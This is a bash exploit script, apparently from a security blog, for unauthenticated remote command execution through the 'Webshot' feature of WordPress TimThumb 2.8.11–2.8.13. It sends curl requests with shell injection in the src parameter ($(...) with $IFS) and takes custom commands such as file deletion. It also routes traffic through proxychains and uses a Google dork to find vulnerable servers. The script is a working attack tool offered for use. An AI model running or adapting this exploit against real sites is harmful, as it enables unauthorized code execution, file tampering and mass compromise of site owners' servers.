#!/bin/bash
# Wordpress TimThumb Remote Command Execution Exploit (0day) v20140627 by 1N3
# (c) http://treadstonesecurity.blogspot.ca
# Usage: sh timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]
#
# ABOUT:
# TimThumb’s “Webshot” feature that allows for certain commands to be executed on the
# vulnerable website remotely (no authentication required). With a simple command, an
# attacker can create, remove and modify any files on your server. Timthumb 2.8.11-2.8.13
# with the WEBSHOT_ENABLED option enabled appear to be vulnerable.
#
# USAGE:
# ./timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]
#
# NOTE: proxy and command fields are optional.
#
# EXAMPLE:
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php none rm$IFS/tmp/a.txt
# ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php proxy 'rm$IFS/tmp/a.txt'
# BANNER
clear
echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== Wordpress TimThumb Remote Command Execution Exploit (0day) by 1N3"
echo ""
# VARS
UNICORNSCAN=`which unicornscan`
CURL=`which curl`
PROXYCHAINS=`which proxychains`
TARGET=$1
BASE_PATH=$2
PROXY=$3
COMMAND=$4
# REQUIREMENTS
if [ "$PROXYCHAINS" == "" ]; then
echo "(--==== Proxychains not installed! Continuing scan without proxy support..."
exit
fi
if [ "$CURL" == "" ]; then
echo "(--==== Curl not installed! Exiting..."
exit
fi
if [ -z "$TARGET" ] || [ -z "$BASE_PATH" ]; then
echo "(--==== Usage: $0 <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]"
exit
fi
if [ $TARGET == "google" ]; then
# USE GOOGLE HACKING TO FIND VULNERABLE SERVERS
echo "Searching Google..."
iceweasel 'https://www.google.com/search?q=TimThumb+version+%3A+2.8.13&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=iceweasel-a#q=inurl:%27%2Ftimthumb.php%27+filetype:php+inurl:plugins+inurl:wp-content&rls=org.mozilla:en-US:unofficial' &
exit
fi
if [ "$PROXY" = "proxy" ]; then
#PROXY ENABLED
echo "(--==== Scanning via proxy..."
if [ -z $COMMAND ]; then
# RUN DEFAULT COMMAND (ie. touch /tmp/a.txt)
echo "(--==== Sending exploit request to: "$TARGET
echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'
proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version
echo "(--==== Exploit Sent! Check the local system for /tmp/a.txt..."
else
# RUN CUSTOM COMMAND
echo "(--==== Sending exploit request to: "$TARGET
echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'
proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version
echo "(--==== Exploit Sent!"
fi
exit
else
# NO PROXY
echo "(--==== Scanning via direct connection..."
if [ -z $COMMAND ]; then
# RUN DEFAULT COMMAND (ie. touch /tmp/a.txt)
echo "(--==== Sending exploit request to: "$TARGET
echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'
curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version
echo "(--==== Exploit Sent! Check the local system for /tmp/a.txt..."
else
# RUN CUSTOM COMMAND
echo "(--==== Sending exploit request to: "$TARGET
echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'
curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version
echo "(--==== Exploit Sent!"
fi
exit
fi
echo ""
echo "(--==== Scan Complete!"
exit
No comments:
Post a Comment